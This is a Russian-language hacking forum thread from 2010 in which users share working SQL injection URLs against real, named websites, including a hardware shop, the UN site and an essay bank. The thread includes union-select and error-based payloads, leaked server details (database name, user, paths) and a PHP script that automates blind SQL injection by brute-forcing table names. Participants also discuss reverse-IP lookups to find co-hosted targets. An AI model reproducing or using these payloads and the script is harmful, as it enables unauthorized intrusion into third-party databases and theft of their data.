 |
|
03.01.2010, 18:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Stalingrad
http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--
version(): 4.0.27-standard
Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(
Jerri,
http://www.un.org/sg/articleFullsearch.asp?TID=1+or+1=(select+top+1+fai ledemailaddress+from+newsadmin.failedemails)--+
|
|
|
03.01.2010, 18:51
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Нашел =)
http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+
|
|
|
|
03.01.2010, 20:35
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
ElteRUS,спс.  |
|
|
|
03.01.2010, 21:29
|
|
Познающий
Регистрация: 18.03.2006
Сообщений: 47
С нами:
10605234
Репутация:
9
|
|
Сообщение от ElteRUS
Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(
А мне вот интересно всетаки,можно ли чтото сделать именно с первой ссылкой там где параметр подставляется в несколько запросов.Просто есть тема на античате https://forum.antichat.ru/showpost.php?p=1047720&postcount=74
Там вот похожий случай,я пытался и так но не получалось.А за то что нашел спасибо , теперь надо подобрать колонки к таблице admin, но ниче не выходит.Может они на немецком/швейцарском 
|
|
|
|
03.01.2010, 22:32
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от ElteRUS
Нашел =)
http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+
Вирус, товарщь!
|
|
|
|
04.01.2010, 05:07
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами:
10695206
Репутация:
245
|
|
вопрос! нашел слепую скуль на одном с порталов одного очень популярного ресурса!
Возникают сразу два вопроса:
1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
2. Возникла проблема в переборе!
Юзаю такой запрос:
Код:
+and+(select+lower(substring(user(),1,1))+from+information_schema.tables+limit+0,1)='a'
Написал скрипт аналогов которому море,
PHP код:
<form method="post">
<input type="type" name="url" value="http://.html?h=15" size="150">
limit <input type="type" name="ntab" value="17" size="1">,1
<input type="submit" name="start" value="Start" style="cursor:pointer">
</form>
<?
$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_";
//$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_+!@#\$%^&*\ '\"()";
$word = '<div class="clear mb25">'; //
$url=$_POST['url']; //
$ntab=$_POST['ntab'];
if($_POST['start']){
for($i=1;$i<=10;$i++){ // Позиція символа перебираємої таблиці
for($j=0;$j<strlen($brutelist);$j++){ // Перебирання символа
$linkout=@file_get_contents($url."+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+".$ntab.",1)='".$brutelist[$j]."'");
preg_match_all($word,$linkout,$out);
if(!$out[0][0]==""){
//echo "<br>".$i."[".$brutelist[$j]."] http://.html?h=15+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+17,1)='".$brutelist[$j]."'";
$fp=fopen("_.txt","a+");
fwrite($fp,$brutelist[$j]);
fclose($fp);
}
}
}
}
?>
проблема долго юзать перебирать и все такое.. есть альтернатива.?
читал статью _http://www.xakep.ru/post/49697/default.asp
ошибок нет, ascii не разрешено юзать, ничего не выводит.
Жду похорошо професионального ответа. 
Последний раз редактировалось Micr0b; 04.01.2010 в 05:10..
|
|
|
|
04.01.2010, 06:48
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
reserse ip ?
|
|
|
|
04.01.2010, 14:49
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами:
10695206
Репутация:
245
|
|
ну да чото забыл)
Кстати проверил mail.ru выдал:
Inbox.ru
Mail.ru
Porsche924.ru
Тоже самое когда *.mail.ru
Для болие точного результату спрошу, тоисть отрицательный?
|
|
|
|
04.01.2010, 18:14
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
я в html файле пишу <script>...</script>, а <html><head><title><bodyl><head><title><body> Писать?> Писать?
|
|
|
|
04.01.2010, 18:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Strilo4ka
если
кто хочет может поиграться банк рефератов!!!
класический вариант юнион + селект не проходит и с дупликатами тоже
Код:
http://www.bank-referatov.info/info.php?id=106+and+1=1+and+substring(version(),1,1)=5
@@basedir: /
@@tmpdir: /tmp/
database(): kupich_kur
@@datadir: /var/lib/mysql/
version(): 5.0.87-community
user(): kupich_Kupich@localhost
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
